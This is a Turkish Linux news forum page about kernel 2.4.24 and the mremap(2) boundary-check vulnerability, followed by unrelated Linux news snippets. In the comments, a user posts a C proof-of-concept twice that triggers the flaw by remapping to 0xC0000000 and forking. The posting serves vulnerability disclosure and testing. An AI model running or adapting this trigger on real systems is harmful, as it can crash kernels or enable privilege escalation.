Kernel 2.4.24 Çıktı

0
bahadirkandemir
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt

Görüşler

0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
0
realist
ne #include ediyoruz?
hangi #include ?
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

OpenSUSE.org Yayında

vst

Daha önceden duyurduğumuz bir haberde Novell'in Suse'nin tüm kaynaklarını açacağını iletmiştik. Bugün Suse haber postalarında http://www.opensuse.org sitesinin yayına girdiği duyuruldu. Son sürümü indirebilirsiniz ve Bugzilla ile hata raporlarınızı iletebilirsiniz.

Lockheed Martin´den Linux projesi

urxalit

Newsalert´teki habere göre Lockheed Martin tasarım projelerinde Linux kullanmaya başlıyor. Haberin devamı için buraya tıklayabilirsiniz.

İzmir´de Linux Around The World Konferansı

o_ozardic

Linux International Başkanı Jon "maddog" Hall, 10 Ocak 2003 Saat:13.00'da İzmir Ekonomi Üniversitesi'nde "Linux Around The World" konulu bir konferans verecek.

Yer: İzmir Ekonomi Üniversitesi. Balçova Kampüsü Konferans Salonu

Konferansla ilgili bilgiye buradan ulasabilirsiniz

Linux International Başkanı Türkiye´de

polat

Bilgisayar işletim sistemi Windows’a alternatif olarak geliştirilen LINUX yazılımının uluslararası tanıtımını yapan sivil toplum örgütü niteliğindeki LINUX International’ın Başkanı Jon Maddog Hall, “Türkiye‘nin bilgisayar teknolojilerinde ihracat yapabilecek bir konuma gelmesini istiyorum” dedi.
Kaynak:www.ntvmsnbc.com

Küçücük bir Linux Daha - Damn Small Linux

LeChuck

Özellikle Knoppix ile popüler olmaya başlayan Live-CD Linux dağıtımlarına bir yenisi daha eklendi. Sadece 50 MB olan ve piyasadaki mini-CDlere ve kart CDlere bile rahatça sığabilecek bu yeni sürüm kurtarma CDsi olarak ve/veya MS Windows kullanan arkadaşlara hava atmak için kullanılabilir. Bu minik ama sevimli dağıtım hakkında daha ayrıntılı bilgi http://www.damnsmalllinux.org adresinden edinilebilir.

....eee ne demişler...önemli olan boyu değil işlevi :P